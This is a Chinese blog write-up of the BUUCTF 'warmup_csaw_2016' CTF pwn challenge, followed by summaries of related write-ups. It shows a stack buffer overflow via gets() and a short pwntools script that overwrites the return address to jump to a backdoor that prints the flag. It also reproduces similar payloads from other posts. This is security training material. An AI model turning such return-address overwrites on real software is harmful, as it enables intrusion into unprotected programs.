BUUCTF PWN warmup_csaw_2016

最新推荐文章于 2025-10-07 18:13:52 发布

原创最新推荐文章于 2025-10-07 18:13:52 发布 · 484 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#linux #安全 #pwn #python #c语言

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

本文探讨了如何通过checksec分析发现程序的溢出漏洞，使用IDA进行静态分析，并通过IDA的调试功能定位gets函数。随后，通过脚本实现远程payload构造与发送，最终找到flag地址。涉及的主题包括溢出技巧、逆向工程和动态代码执行。

1.checksec+运行

64位/没有保护

2.64位IDA进行

1.main 函数

明显的溢出函数gets()

跟进v5看看

offset = 0x40+8

shift+f12

真不错,cat flag.txt

找它的地址

3.上脚本

from pwn import*
#p=process('./3warmup')
p=remote("node4.buuoj.cn",28180)
flag_addr=0x400611
payload=b'a'*(0x40+8)+p64(flag_addr)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

warmup_csaw_2016

weixin_56301399的博客

07-20

1666

做了几道入门的题，从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁，我决定实施菜狗子计划，让蚂蚁继续进化。题目中的思路很清晰，对于栈溢出，我们先判断是否有栈溢出的漏洞，之后去找系统调用的函数，然后查到他的地址，最后就是我们的代码构建了。偏移量的计算=（数组本身大小+对应位的偏移64位是ox8）然后加上我们系统调用函数的地址。...

【BUUCTF】warmup_csaw_2016

2201_75556700的博客

11-29

650

4、这里有两个数组都是64字节，在sprintf这里，将sub_40060D函数的地址存放在s中。题目一：【BUUCTF】warmup_csaw_2016。3、使用ida64分析文件，找到main函数，F5反汇编。2、下载附件，在kali中分析，64位，小端存储。5、查看函数sub_40060D，地址。03、权限不够时，添加权限就可以。04、使用r命令运行程序。05、使用n命令单步调试。01、使用gdb工具。

参与评论您还未登录，请先登录后发表或查看评论

[BUUCTF-PWN] warmup_csaw_2016

最新发布

weixin_44570459的博客

10-07

120

3、双击后通过ctrl+x交叉引用，定位这个敏感字符串在sub_40060D这个地址函数中被调用。4、进一步跟踪该地址函数，发现该函数为后门函数，通过系统调用读取flag.txt。1、发现存在gets函数，可导致栈溢出漏洞，其中v5长度为0x40。2、通过shitf+F12发现敏感字符串：cat flag.txt。

buuctf--pwn-warmup

weixin_45427676的博客

09-19

611

下载文件后首先查看保护机制，checksec发现没有开什么保护，64位程序，在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞，然后发现有后门函数，也就是sub_40060D函数，而且会发现你执行此程序的时候可以直接输出后门函数的地址，就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址，所以执行的时候就可以直接看到后门函数地址。所以现在的漏洞利用思路就是将v5缓冲区覆盖

buuctf 之warmup_csaw_2016

weixin_54452942的博客

03-25

637

发现了一个gets函数可以溢出，并且在上面的运行中，我们看到他输出了一个地址，在下面的sprintf函数中将一个函数的地址输出了，我们去看看这个函数是干什么的。一种是ida直接看（不一定准），40h是64字节，再加8字节的rbp就是ret的位置。这里的返回地址，也就是rbp下面的地址是df28，我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址，或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。

[每日一PWN]BUUCTF warmup_csaw_2016

qq_55233040的博客

11-20

591

和第一题RIP一样，是经典而基础的ret2text。

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

5897

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

BUUCTF PWN wp--warmup_csaw_2016

2302_81740139的博客

08-19

1334

这个数组在栈帧中的位置相对于基指针ebp是偏移量-40的地方（如果ebp指向栈帧的底部），这通常意味着它是函数中的一个局部变量。PIE（Position-Independent Executable）是一种安全特性，它使得程序的代码可以在内存中的任意位置加载，这样每次程序运行时地址空间布局都是随机的，增加了利用内存损坏漏洞的难度。在函数开始执行时，如果函数要使用某些寄存器，并且这些寄存器在调用者中之后还需要使用，那么这些寄存器的值需要在栈上保存，以便在函数返回前恢复。仅为个人理解，如有错误，请指正。

【BUUCTF-PWN】3-warmup_csaw_2016

燕麦葡萄干的博客

07-04

379

checksec检查是64位，未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。

BUUctf warmup_csaw_2016

A_fish_like_sing的博客

03-14

489

buu ctf pwn warmup_csaw_2016

BUUCTF-PWN题详解（warmup_csaw_2016&ciscn_2019_n_1）

2302_80325559的博客

11-26

1253

在文章后面补充了栈的知识点，大佬们可以先看看然后再看题解。

buuctf warmup_csaw_2016

yidalipao1的博客

09-03

692

buuctf pwn

BUUCTF-warmup_csaw_2016

m0_64180167的博客

04-11

558

64位的linux文件。

buuctf|warmup_csaw_2016 1

m0_64236521的博客

04-15

1839

buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下，是64位文件拉进ida，发现gets(v5),查看v5,明显的栈溢出找到system，地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...

BUUCTF|warmup_csaw_2016 1

cm_zl

04-30

1406

from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()

BUUCTF|PWN-warmup_csaw_2016-WP

l2645470582_的博客

07-28

598

1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件，我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串，f5进入反编译代码区查看main函数 3.3、我们看到s和v5字符数组，查看他们所占字节 v5有溢出: r(返回地址)：关键字符串函数地址 4、编译代码 #i...

BUUCTF warmup_csaw_2016

m0_54262894的博客

08-20

429

BUUCTF warmup_csaw_2016 下载文件，把它拖入虚拟机中先checksec一下这是一个64位的文件，并且没有开启任何的保护我们先运行一下试试发现它给出了一个地址，我们先记下，可能会用到放入64位IDA中查看一下他的代码伪C代码↓ 汇编代码↓ 发现了一个函数sprintf，并且用%p的方式来输出，也就是输出地址下面是我搜索到的信息我们双击40060D看一下再回过头来看代码众所周知gets函.

[BUUCTF]PWN3——warmup_csaw_2016

mcmuyanga的博客

08-24

1124

[BUUCTF]3——warmup_csaw_2016 题目网址：https://buuoj.cn/challenges#warmup_csaw_2016 步骤：例行检查，64位，没有开启任何保护 nc一下，看看输入点的字符串，看到回显了一个地址，之后让我们输入，输入完之后就退出了用64位ida打开附件，首先shift+f12查看程序里的字符串，可以看到有一个“cat flag.txt”字符串引人注目双击字符串跟进，ctrl+x查看哪个函数调用了这个字符串，找到函数后按f5反编译成我们熟悉的伪代

buuctf pwn others_shellcode

02-25

### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码，通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备为了成功完成...